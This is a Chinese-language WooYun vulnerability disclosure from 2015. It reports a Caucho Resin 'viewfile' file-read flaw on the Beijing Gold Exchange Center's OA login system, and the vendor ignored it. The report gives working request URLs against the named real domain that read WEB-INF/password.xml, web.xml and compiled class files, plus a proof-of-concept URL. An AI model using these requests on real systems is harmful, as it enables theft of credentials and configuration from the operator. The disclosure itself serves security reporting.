漏洞概要
关注数(24)
关注此漏洞
漏洞标题:北京黄金交易中心某系统存在远程文件读取漏洞,内部信息泄漏
提交时间:2015-12-19 12:42
修复时间:2015-12-24 12:44
公开时间:2015-12-24 12:44
漏洞类型:文件包含
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2015-12-19: 细节已通知厂商并且等待厂商处理中
2015-12-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
北京产权交易所(简称“北交所”)是经北京市人民政府批准设立的综合性产权交易机构,是以企业产权交易为基础,集各类权益交易服务为一体的专业化市场平台。
具有双重职能,一是,贯彻落实国家十二五计划,对国家各部委在机构改革中的国有资产进行重组、产权转让、资产并购、股权融资、资源整合等全要素、全流程服务。二是,服务于多品种权益交易的基础性资本市场平台。
北交所是中国最大的产权交易桥梁和纽带中心。
北京黄金交易中心(简称:北京黄金)是经北京市政府批准,依托北京产权交易所集团平台建立并发展的综合性贵金属交易机构。
详细说明:
黄金交易协同商务系统地址http://oa.bjgold.com.cn/login/Login.jsp存在Caucho Resin viewfile远程文件及路径泄露漏洞
http://oa.bjgold.com.cn/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml
http://oa.bjgold.com.cn/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml
http://oa.bjgold.com.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
错误的路径暴泄漏安装的绝对路径
漏洞证明:
http://oa.bjgold.com.cn/Resin-doc/viewfile/?file=index.Jsp
修复方案:
版权声明:转载请注明来源 朱元璋@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-24 12:44
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无
漏洞评价:
评价